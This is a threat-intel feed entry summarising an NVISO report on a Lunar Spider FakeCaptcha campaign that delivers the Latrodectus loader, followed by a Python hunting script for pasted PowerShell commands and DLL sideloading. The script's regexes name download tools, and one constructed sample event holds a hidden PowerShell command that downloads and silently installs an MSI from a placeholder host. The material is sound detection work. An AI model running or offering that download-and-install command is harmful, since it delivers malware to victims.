Lunar Spider Expands their Web via FakeCaptcha
ID: 24cdd3c9-d4d0-519c-a9f1-c4694aad7388
STIX ID: report--24cdd3c9-d4d0-519c-a9f1-c4694aad7388
Feed Name: NVISO Labs
NVISO documents an active Lunar Spider campaign delivering the Latrodectus V2 loader. The operators exploit CORS-vulnerable websites to inject a FakeCaptcha (TeleCaptcha) JavaScript lure that copies a PowerShell download command to the victim's clipboard for the victim to paste and run. The resulting installer drops a legitimately signed Intel executable that sideloads a malicious DLL, which then handles C2 communication and host enumeration and provides initial access for ransomware affiliates. The blog provides detailed technical analysis, IoCs (domains and SHA-256 hashes), code snippets, and hunting/detection queries (URLScan, KQL) mapped to MITRE ATT&CK.
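The two observable stages in that chain, the pasted PowerShell download command and the DLL sideload by a signed host executable, can be hunted in endpoint telemetry. The following is an added example written for this summary, not NVISO's published KQL or URLScan queries: two Sysmon-shaped heuristics (EID 1 process creation, EID 7 image load) run over constructed sample events. It assumes the lure has the victim paste into the Win+R Run dialog (so the parent process is explorer.exe), that a sideload candidate is an unsigned DLL loaded from the host executable's own user-writable directory, and that the download cradle looks like a typical ClickFix/FakeCaptcha one-liner; the regexes, paths and URL are illustrative, not campaign IoCs.

```python
"""Hunting heuristics for a FakeCaptcha -> PowerShell -> DLL-sideload chain.

Added example, not NVISO's detection content. Field names follow Sysmon
Event ID 1 (process create) and Event ID 7 (image load). SAMPLE_EVENTS below
are constructed, not captured from a real host.
"""
import ntpath
import re

# Download cradles commonly seen in pasted one-liners (assumption: the exact
# command used by this campaign is not reproduced here).
CRADLE_RE = re.compile(
    r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|start-bitstransfer|\bcurl\b|\bwget\b|\bmsiexec\b)",
    re.I,
)
URL_RE = re.compile(r"https?://", re.I)
EVASION_RE = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\s|-nop\b|bypass)", re.I
)
SYSTEM_DIRS = ("c:\\windows\\system32", "c:\\windows\\syswow64")
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\")


def _base(path):
    return ntpath.basename(path).lower()


def _dir(path):
    return ntpath.dirname(path).lower()


def is_pasted_powershell(ev):
    """EID 1: PowerShell launched from the shell with a download cradle."""
    if ev.get("EventID") != 1:
        return False
    if _base(ev.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return False
    # Assumption: the victim pastes into Win+R, so explorer.exe is the parent.
    if _base(ev.get("ParentImage", "")) != "explorer.exe":
        return False
    cmd = ev.get("CommandLine", "")
    return bool(CRADLE_RE.search(cmd) and (URL_RE.search(cmd) or EVASION_RE.search(cmd)))


def is_sideload(ev):
    """EID 7: unsigned DLL loaded from the host executable's own directory."""
    if ev.get("EventID") != 7:
        return False
    host = ev.get("Image", "").lower()
    dll = ev.get("ImageLoaded", "").lower()
    if not dll.endswith(".dll"):
        return False
    # In Sysmon EID 7 the 'Signed' field describes ImageLoaded, not the host.
    if ev.get("Signed", "false").lower() == "true":
        return False
    if _dir(dll).startswith(SYSTEM_DIRS) or _dir(host).startswith(SYSTEM_DIRS):
        return False
    # Assumption: sideload = DLL beside the host, in a user-writable location.
    return _dir(dll) == _dir(host) and _dir(host).startswith(USER_WRITABLE)


RULES = (
    ("fakecaptcha_pasted_powershell", is_pasted_powershell),
    ("unsigned_dll_sideload", is_sideload),
)


def hunt(events):
    """Return (rule_name, ProcessId) for every event that trips a rule."""
    return [(name, ev["ProcessId"]) for ev in events for name, rule in RULES if rule(ev)]


# Constructed sample telemetry: one true positive per rule plus two benign events.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 4120,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/x -OutFile '
                    '$env:TEMP\\x.msi; msiexec /i $env:TEMP\\x.msi /qn"'},
    {"EventID": 1, "ProcessId": 4300,
     "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"pwsh -File C:\scripts\backup.ps1"},
    {"EventID": 7, "ProcessId": 5010,
     "Image": r"C:\Users\victim\AppData\Local\Temp\updater.exe",
     "ImageLoaded": r"C:\Users\victim\AppData\Local\Temp\helper.dll", "Signed": "false"},
    {"EventID": 7, "ProcessId": 5010,
     "Image": r"C:\Users\victim\AppData\Local\Temp\updater.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for rule_name, pid in hunt(SAMPLE_EVENTS):
        print(rule_name, pid)
```

The first rule keys on the delivery mechanism rather than on any single domain or hash, so it survives infrastructure rotation; tune the parent-process check to your environment (a lure that instructs the victim to use a terminal instead of Win+R will show cmd.exe or WindowsTerminal.exe as the parent). The second rule is deliberately broad and will fire on some legitimate software that ships unsigned DLLs next to its executable, so pair it with the host executable's signer and the IoC hashes from the report before alerting.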
